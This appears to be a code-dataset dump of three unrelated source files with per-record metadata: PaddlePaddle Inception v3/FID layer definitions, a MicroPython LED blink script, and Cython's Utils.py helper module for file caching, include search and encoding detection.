self.branch_pool = ConvBNLayer(in_channels,
pool_features,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1)
class InceptionB(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionB, self).__init__()
self.branch3x3 = ConvBNLayer(in_channels,
384,
3,
stride=2,
name=name + '.branch3x3')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
stride=2,
name=name + '.branch3x3dbl_3')
self.branch_pool = MaxPool2D(kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool(x)
return paddle.concat([branch3x3, branch3x3dbl, branch_pool],
axis=1)
class InceptionC(nn.Layer):
def __init__(self, in_channels, c7, name=None):
super(InceptionC, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch1x1')
self.branch7x7_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7_1')
self.branch7x7_2 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7_2')
self.branch7x7_3 = ConvBNLayer(c7,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7_3')
self.branch7x7dbl_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7dbl_1')
self.branch7x7dbl_2 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_2')
self.branch7x7dbl_3 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_3')
self.branch7x7dbl_4 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_4')
self.branch7x7dbl_5 = ConvBNLayer(c7,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_5')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1)
class InceptionD(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionD, self).__init__()
self.branch3x3_1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch3x3_1')
self.branch3x3_2 = ConvBNLayer(192,
320,
3,
stride=2,
name=name + '.branch3x3_2')
self.branch7x7x3_1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch7x7x3_1')
self.branch7x7x3_2 = ConvBNLayer(192,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7x3_2')
self.branch7x7x3_3 = ConvBNLayer(192,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7x3_3')
self.branch7x7x3_4 = ConvBNLayer(192,
192,
3,
stride=2,
name=name + '.branch7x7x3_4')
self.branch_pool = MaxPool2D(kernel_size=3, stride=2)
def forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = self.branch_pool(x)
return paddle.concat([branch3x3, branch7x7x3, branch_pool],
axis=1)
class InceptionE(nn.Layer):
def __init__(self, in_channels, name=None):
super(InceptionE, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class InceptionAux(nn.Layer):
def __init__(self, in_channels, num_classes, name=None):
super(InceptionAux, self).__init__()
self.num_classes = num_classes
self.pool0 = AvgPool2D(kernel_size=5, stride=3)
self.conv0 = ConvBNLayer(in_channels, 128, 1, name=name + '.conv0')
self.conv1 = ConvBNLayer(128, 768, 5, name=name + '.conv1')
self.pool1 = AvgPool2D(global_pooling=True)
def forward(self, x):
x = self.pool0(x)
x = self.conv0(x)
x = self.conv1(x)
x = self.pool1(x)
x = paddle.flatten(x, axis=1)
x = paddle.static.nn.fc(x, size=self.num_classes)
return x
class Fid_inceptionA(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, pool_features, name=None):
super(Fid_inceptionA, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch1x1')
self.branch5x5_1 = ConvBNLayer(in_channels,
48,
1,
name=name + '.branch5x5_1')
self.branch5x5_2 = ConvBNLayer(48,
64,
5,
padding=2,
name=name + '.branch5x5_2')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
64,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(64,
96,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3 = ConvBNLayer(96,
96,
3,
padding=1,
name=name + '.branch3x3dbl_3')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
pool_features,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch5x5, branch3x3dbl, branch_pool], axis=1)
class Fid_inceptionC(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, c7, name=None):
super(Fid_inceptionC, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch1x1')
self.branch7x7_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7_1')
self.branch7x7_2 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7_2')
self.branch7x7_3 = ConvBNLayer(c7,
192, (7, 1),
padding=(3, 0),
name=name + '.branch7x7_3')
self.branch7x7dbl_1 = ConvBNLayer(in_channels,
c7,
1,
name=name + '.branch7x7dbl_1')
self.branch7x7dbl_2 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_2')
self.branch7x7dbl_3 = ConvBNLayer(c7,
c7, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_3')
self.branch7x7dbl_4 = ConvBNLayer(c7,
c7, (7, 1),
padding=(3, 0),
name=name + '.branch7x7dbl_4')
self.branch7x7dbl_5 = ConvBNLayer(c7,
192, (1, 7),
padding=(0, 3),
name=name + '.branch7x7dbl_5')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch7x7, branch7x7dbl, branch_pool], axis=1)
class Fid_inceptionE_1(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, name=None):
super(Fid_inceptionE_1, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
self.branch_pool0 = AvgPool2D(kernel_size=3,
stride=1,
padding=1,
exclusive=True)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class Fid_inceptionE_2(nn.Layer):
""" FID block in inception v3
"""
def __init__(self, in_channels, name=None):
super(Fid_inceptionE_2, self).__init__()
self.branch1x1 = ConvBNLayer(in_channels,
320,
1,
name=name + '.branch1x1')
self.branch3x3_1 = ConvBNLayer(in_channels,
384,
1,
name=name + '.branch3x3_1')
self.branch3x3_2a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3_2a')
self.branch3x3_2b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3_2b')
self.branch3x3dbl_1 = ConvBNLayer(in_channels,
448,
1,
name=name + '.branch3x3dbl_1')
self.branch3x3dbl_2 = ConvBNLayer(448,
384,
3,
padding=1,
name=name + '.branch3x3dbl_2')
self.branch3x3dbl_3a = ConvBNLayer(384,
384, (1, 3),
padding=(0, 1),
name=name + '.branch3x3dbl_3a')
self.branch3x3dbl_3b = ConvBNLayer(384,
384, (3, 1),
padding=(1, 0),
name=name + '.branch3x3dbl_3b')
### same with paper
self.branch_pool0 = MaxPool2D(kernel_size=3,
stride=1,
padding=1)
self.branch_pool = ConvBNLayer(in_channels,
192,
1,
name=name + '.branch_pool')
def forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3_1 = self.branch3x3_1(x)
branch3x3_2a = self.branch3x3_2a(branch3x3_1)
branch3x3_2b = self.branch3x3_2b(branch3x3_1)
branch3x3 = paddle.concat([branch3x3_2a, branch3x3_2b], axis=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl_3a = self.branch3x3dbl_3a(branch3x3dbl)
branch3x3dbl_3b = self.branch3x3dbl_3b(branch3x3dbl)
branch3x3dbl = paddle.concat([branch3x3dbl_3a, branch3x3dbl_3b],
axis=1)
branch_pool = self.branch_pool0(x)
branch_pool = self.branch_pool(branch_pool)
return paddle.concat(
[branch1x1, branch3x3, branch3x3dbl, branch_pool], axis=1)
class ConvBNLayer(nn.Layer):
def __init__(self,
in_channels,
num_filters,
filter_size,
stride=1,
padding=0,
groups=1,
act='relu',
name=None):
super(ConvBNLayer, self).__init__()
self.conv = Conv2D(in_channels=in_channels,
out_channels=num_filters,
kernel_size=filter_size,
stride=stride,
padding=padding,
groups=groups,
weight_attr=paddle.ParamAttr(name=name + ".conv.weight"),
bias_attr=False)
self.bn = BatchNorm(num_filters,
act=act,
epsilon=0.001,
param_attr=paddle.ParamAttr(name=name + ".bn.weight"),
bias_attr=paddle.ParamAttr(name=name + ".bn.bias"),
moving_mean_name=name + '.bn.running_mean',
moving_variance_name=name + '.bn.running_var')
def forward(self, inputs):
y = self.conv(inputs)
y = self.bn(y)
return y
|
en
| 0.794403
|
#Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. # First max pooling features # Second max pooling featurs # Pre-aux classifier features # Final average pooling features ### block1 ### block2 ### Mixed_5b 5c 5d ### Mixed_6 ### block3 ### Mixed_7 FID block in inception v3 FID block in inception v3 FID block in inception v3 FID block in inception v3 ### same with paper
| 2.263951
| 2
|
on_board_led/main.py
|
ushiboy/picopico
| 0
|
6628127
|
import time
from machine import Pin
led = Pin(25, Pin.OUT)
while True:
led.toggle()
time.sleep(1)
|
import time
from machine import Pin
led = Pin(25, Pin.OUT)
while True:
led.toggle()
time.sleep(1)
|
none
| 1
| 2.819053
| 3
|
|
contrib/tools/cython/Cython/Utils.py
|
SitdikovRustam/CatBoost
| 1
|
6628128
|
#
# Cython -- Things that don't belong
# anywhere else in particular
#
from __future__ import absolute_import
try:
from __builtin__ import basestring
except ImportError:
basestring = str
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
cache = {}
uncomputed = object()
def wrapper(*args):
res = cache.get(args, uncomputed)
if res is uncomputed:
res = cache[args] = f(*args)
return res
wrapper.uncached = f
return wrapper
def cached_method(f):
cache_name = '__%s_cache' % f.__name__
def wrapper(self, *args):
cache = getattr(self, cache_name, None)
if cache is None:
cache = {}
setattr(self, cache_name, cache)
if args in cache:
return cache[args]
res = cache[args] = f(self, *args)
return res
return wrapper
def replace_suffix(path, newsuf):
base, _ = os.path.splitext(path)
return base + newsuf
def open_new_file(path):
if os.path.exists(path):
# Make sure to create a new file here so we can
# safely hard link the output files.
os.unlink(path)
# we use the ISO-8859-1 encoding here because we only write pure
# ASCII strings or (e.g. for file names) byte encoded strings as
# Unicode, so we need a direct mapping from the first 256 Unicode
# characters to a byte sequence, which ISO-8859-1 provides
# note: can't use io.open() in Py2 as we may be writing str objects
return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
# Remove junk contents from an output file after a
# failed compilation.
# Also sets access and modification times back to
# those specified by st (a stat struct).
try:
f = open_new_file(path)
except EnvironmentError:
pass
else:
f.write(
"#error Do not use this file, it is the result of a failed Cython compilation.\n")
f.close()
if st:
os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
ftime = modification_time(path)
return ftime > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
include=False, sys_path=False):
# Search the list of include directories for the given
# file name. If a source file position is given, first
# searches the directory containing that file. Returns
# None if not found, but does not report an error.
# The 'include' option will disable package dereferencing.
# If 'sys_path' is True, also search sys.path.
if sys_path:
dirs = dirs + tuple(sys.path)
if pos:
file_desc = pos[0]
from Cython.Compiler.Scanning import FileSourceDescriptor
if not isinstance(file_desc, FileSourceDescriptor):
raise RuntimeError("Only file sources for code supported")
if include:
dirs = (os.path.dirname(file_desc.filename),) + dirs
else:
dirs = (find_root_package_dir(file_desc.filename),) + dirs
dotted_filename = qualified_name
if suffix:
dotted_filename += suffix
if not include:
names = qualified_name.split('.')
package_names = tuple(names[:-1])
module_name = names[-1]
module_filename = module_name + suffix
package_filename = "__init__" + suffix
for dir in dirs:
path = os.path.join(dir, dotted_filename)
if path_exists(path):
return path
if not include:
package_dir = check_package_dir(dir, package_names)
if package_dir is not None:
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
# Arcadia-specific lookup: search for packages in include paths,
# ignoring existence of __init__.py files as packages markers
# (they are not required by Arcadia build system)
if not include:
for dir in dirs:
package_dir = os.path.join(dir, *package_names)
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
return None
@cached_function
def find_root_package_dir(file_path):
dir = os.path.dirname(file_path)
if file_path == dir:
return dir
elif is_package_dir(dir):
return find_root_package_dir(dir)
else:
return dir
@cached_function
def check_package_dir(dir, package_names):
for dirname in package_names:
dir = os.path.join(dir, dirname)
if not is_package_dir(dir):
return None
return dir
@cached_function
def is_package_dir(dir_path):
for filename in ("__init__.py",
"__init__.pyc",
"__init__.pyx",
"__init__.pxd"):
path = os.path.join(dir_path, filename)
if path_exists(path):
return 1
@cached_function
def path_exists(path):
# try on the filesystem first
if os.path.exists(path):
return True
# figure out if a PEP 302 loader is around
try:
loader = __loader__
# XXX the code below assumes a 'zipimport.zipimporter' instance
# XXX should be easy to generalize, but too lazy right now to write it
archive_path = getattr(loader, 'archive', None)
if archive_path:
normpath = os.path.normpath(path)
if normpath.startswith(archive_path):
arcname = normpath[len(archive_path)+1:]
try:
loader.get_data(arcname)
return True
except IOError:
return False
except NameError:
pass
return False
# file name encodings
def decode_filename(filename):
if isinstance(filename, bytes):
try:
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding = sys.getdefaultencoding()
filename = filename.decode(filename_encoding)
except UnicodeDecodeError:
pass
return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
def detect_file_encoding(source_filename):
f = open_source_file(source_filename, encoding="UTF-8", error_handling='ignore')
try:
return detect_opened_file_encoding(f)
finally:
f.close()
def detect_opened_file_encoding(f):
# PEPs 263 and 3120
# Most of the time the first two lines fall in the first 250 chars,
# and this bulk read/split is much faster.
lines = f.read(250).split(u"\n")
if len(lines) > 1:
m = _match_file_encoding(lines[0])
if m:
return m.group(1)
elif len(lines) > 2:
m = _match_file_encoding(lines[1])
if m:
return m.group(1)
else:
return "UTF-8"
# Fallback to one-char-at-a-time detection.
f.seek(0)
chars = []
for i in range(2):
c = f.read(1)
while c and c != u'\n':
chars.append(c)
c = f.read(1)
encoding = _match_file_encoding(u''.join(chars))
if encoding:
return encoding.group(1)
return "UTF-8"
def skip_bom(f):
"""
Read past a BOM at the beginning of a source file.
This could be added to the scanner, but it's *substantially* easier
to keep it at this level.
"""
if f.read(1) != u'\uFEFF':
f.seek(0)
def open_source_file(source_filename, mode="r",
encoding=None, error_handling=None):
if encoding is None:
# Most of the time the coding is unspecified, so be optimistic that
# it's UTF-8.
f = open_source_file(source_filename, encoding="UTF-8", mode=mode, error_handling='ignore')
encoding = detect_opened_file_encoding(f)
if encoding == "UTF-8" and error_handling == 'ignore':
f.seek(0)
skip_bom(f)
return f
else:
f.close()
if not os.path.exists(source_filename):
try:
loader = __loader__
if source_filename.startswith(loader.archive):
return open_source_from_loader(
loader, source_filename,
encoding, error_handling)
except (NameError, AttributeError):
pass
stream = io.open(source_filename, mode=mode,
encoding=encoding, errors=error_handling)
skip_bom(stream)
return stream
def open_source_from_loader(loader,
source_filename,
encoding=None, error_handling=None):
nrmpath = os.path.normpath(source_filename)
arcname = nrmpath[len(loader.archive)+1:]
data = loader.get_data(arcname)
return io.TextIOWrapper(io.BytesIO(data),
encoding=encoding,
errors=error_handling)
def str_to_number(value):
# note: this expects a string as input that was accepted by the
# parser already, with an optional "-" sign in front
is_neg = False
if value[:1] == '-':
is_neg = True
value = value[1:]
if len(value) < 2:
value = int(value, 0)
elif value[0] == '0':
literal_type = value[1] # 0'o' - 0'b' - 0'x'
if literal_type in 'xX':
# hex notation ('0x1AF')
value = int(value[2:], 16)
elif literal_type in 'oO':
# Py3 octal notation ('0o136')
value = int(value[2:], 8)
elif literal_type in 'bB':
# Py3 binary notation ('0b101')
value = int(value[2:], 2)
else:
# Py2 octal notation ('0136')
value = int(value, 8)
else:
value = int(value, 0)
return -value if is_neg else value
def long_literal(value):
if isinstance(value, basestring):
value = str_to_number(value)
return not -2**31 <= value < 2**31
@cached_function
def get_cython_cache_dir():
"""get the cython cache dir
Priority:
1. CYTHON_CACHE_DIR
2. (OS X): ~/Library/Caches/Cython
(posix not OS X): XDG_CACHE_HOME/cython if XDG_CACHE_HOME defined
3. ~/.cython
"""
if 'CYTHON_CACHE_DIR' in os.environ:
return os.environ['CYTHON_CACHE_DIR']
parent = None
if os.name == 'posix':
if sys.platform == 'darwin':
parent = os.path.expanduser('~/Library/Caches')
else:
# this could fallback on ~/.cache
parent = os.environ.get('XDG_CACHE_HOME')
if parent and os.path.isdir(parent):
return os.path.join(parent, 'cython')
# last fallback: ~/.cython
return os.path.expanduser(os.path.join('~', '.cython'))
@contextmanager
def captured_fd(stream=2, encoding=None):
pipe_in = t = None
orig_stream = os.dup(stream) # keep copy of original stream
try:
pipe_in, pipe_out = os.pipe()
os.dup2(pipe_out, stream) # replace stream by copy of pipe
try:
os.close(pipe_out) # close original pipe-out stream
data = []
def copy():
try:
while True:
d = os.read(pipe_in, 1000)
if d:
data.append(d)
else:
break
finally:
os.close(pipe_in)
def get_output():
output = b''.join(data)
if encoding:
output = output.decode(encoding)
return output
from threading import Thread
t = Thread(target=copy)
t.daemon = True # just in case
t.start()
yield get_output
finally:
os.dup2(orig_stream, stream) # restore original stream
if t is not None:
t.join()
finally:
os.close(orig_stream)
def print_bytes(s, end=b'\n', file=sys.stdout, flush=True):
file.flush()
try:
out = file.buffer # Py3
except AttributeError:
out = file # Py2
out.write(s)
if end:
out.write(end)
if flush:
out.flush()
class LazyStr:
def __init__(self, callback):
self.callback = callback
def __str__(self):
return self.callback()
def __repr__(self):
return self.callback()
def __add__(self, right):
return self.callback() + right
def __radd__(self, left):
return left + self.callback()
# Class decorator that adds a metaclass and recreates the class with it.
# Copied from 'six'.
def add_metaclass(metaclass):
"""Class decorator for creating a class with a metaclass."""
def wrapper(cls):
orig_vars = cls.__dict__.copy()
slots = orig_vars.get('__slots__')
if slots is not None:
if isinstance(slots, str):
slots = [slots]
for slots_var in slots:
orig_vars.pop(slots_var)
orig_vars.pop('__dict__', None)
orig_vars.pop('__weakref__', None)
return metaclass(cls.__name__, cls.__bases__, orig_vars)
return wrapper
|
#
# Cython -- Things that don't belong
# anywhere else in particular
#
from __future__ import absolute_import
try:
from __builtin__ import basestring
except ImportError:
basestring = str
import os
import sys
import re
import io
import codecs
from contextlib import contextmanager
modification_time = os.path.getmtime
def cached_function(f):
cache = {}
uncomputed = object()
def wrapper(*args):
res = cache.get(args, uncomputed)
if res is uncomputed:
res = cache[args] = f(*args)
return res
wrapper.uncached = f
return wrapper
def cached_method(f):
cache_name = '__%s_cache' % f.__name__
def wrapper(self, *args):
cache = getattr(self, cache_name, None)
if cache is None:
cache = {}
setattr(self, cache_name, cache)
if args in cache:
return cache[args]
res = cache[args] = f(self, *args)
return res
return wrapper
def replace_suffix(path, newsuf):
base, _ = os.path.splitext(path)
return base + newsuf
def open_new_file(path):
if os.path.exists(path):
# Make sure to create a new file here so we can
# safely hard link the output files.
os.unlink(path)
# we use the ISO-8859-1 encoding here because we only write pure
# ASCII strings or (e.g. for file names) byte encoded strings as
# Unicode, so we need a direct mapping from the first 256 Unicode
# characters to a byte sequence, which ISO-8859-1 provides
# note: can't use io.open() in Py2 as we may be writing str objects
return codecs.open(path, "w", encoding="ISO-8859-1")
def castrate_file(path, st):
# Remove junk contents from an output file after a
# failed compilation.
# Also sets access and modification times back to
# those specified by st (a stat struct).
try:
f = open_new_file(path)
except EnvironmentError:
pass
else:
f.write(
"#error Do not use this file, it is the result of a failed Cython compilation.\n")
f.close()
if st:
os.utime(path, (st.st_atime, st.st_mtime-1))
def file_newer_than(path, time):
ftime = modification_time(path)
return ftime > time
@cached_function
def search_include_directories(dirs, qualified_name, suffix, pos,
include=False, sys_path=False):
# Search the list of include directories for the given
# file name. If a source file position is given, first
# searches the directory containing that file. Returns
# None if not found, but does not report an error.
# The 'include' option will disable package dereferencing.
# If 'sys_path' is True, also search sys.path.
if sys_path:
dirs = dirs + tuple(sys.path)
if pos:
file_desc = pos[0]
from Cython.Compiler.Scanning import FileSourceDescriptor
if not isinstance(file_desc, FileSourceDescriptor):
raise RuntimeError("Only file sources for code supported")
if include:
dirs = (os.path.dirname(file_desc.filename),) + dirs
else:
dirs = (find_root_package_dir(file_desc.filename),) + dirs
dotted_filename = qualified_name
if suffix:
dotted_filename += suffix
if not include:
names = qualified_name.split('.')
package_names = tuple(names[:-1])
module_name = names[-1]
module_filename = module_name + suffix
package_filename = "__init__" + suffix
for dir in dirs:
path = os.path.join(dir, dotted_filename)
if path_exists(path):
return path
if not include:
package_dir = check_package_dir(dir, package_names)
if package_dir is not None:
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
# Arcadia-specific lookup: search for packages in include paths,
# ignoring existence of __init__.py files as packages markers
# (they are not required by Arcadia build system)
if not include:
for dir in dirs:
package_dir = os.path.join(dir, *package_names)
path = os.path.join(package_dir, module_filename)
if path_exists(path):
return path
path = os.path.join(dir, package_dir, module_name,
package_filename)
if path_exists(path):
return path
return None
@cached_function
def find_root_package_dir(file_path):
dir = os.path.dirname(file_path)
if file_path == dir:
return dir
elif is_package_dir(dir):
return find_root_package_dir(dir)
else:
return dir
@cached_function
def check_package_dir(dir, package_names):
for dirname in package_names:
dir = os.path.join(dir, dirname)
if not is_package_dir(dir):
return None
return dir
@cached_function
def is_package_dir(dir_path):
for filename in ("__init__.py",
"__init__.pyc",
"__init__.pyx",
"__init__.pxd"):
path = os.path.join(dir_path, filename)
if path_exists(path):
return 1
@cached_function
def path_exists(path):
# try on the filesystem first
if os.path.exists(path):
return True
# figure out if a PEP 302 loader is around
try:
loader = __loader__
# XXX the code below assumes a 'zipimport.zipimporter' instance
# XXX should be easy to generalize, but too lazy right now to write it
archive_path = getattr(loader, 'archive', None)
if archive_path:
normpath = os.path.normpath(path)
if normpath.startswith(archive_path):
arcname = normpath[len(archive_path)+1:]
try:
loader.get_data(arcname)
return True
except IOError:
return False
except NameError:
pass
return False
# file name encodings
def decode_filename(filename):
if isinstance(filename, bytes):
try:
filename_encoding = sys.getfilesystemencoding()
if filename_encoding is None:
filename_encoding = sys.getdefaultencoding()
filename = filename.decode(filename_encoding)
except UnicodeDecodeError:
pass
return filename
# support for source file encoding detection
_match_file_encoding = re.compile(u"coding[:=]\s*([-\w.]+)").search
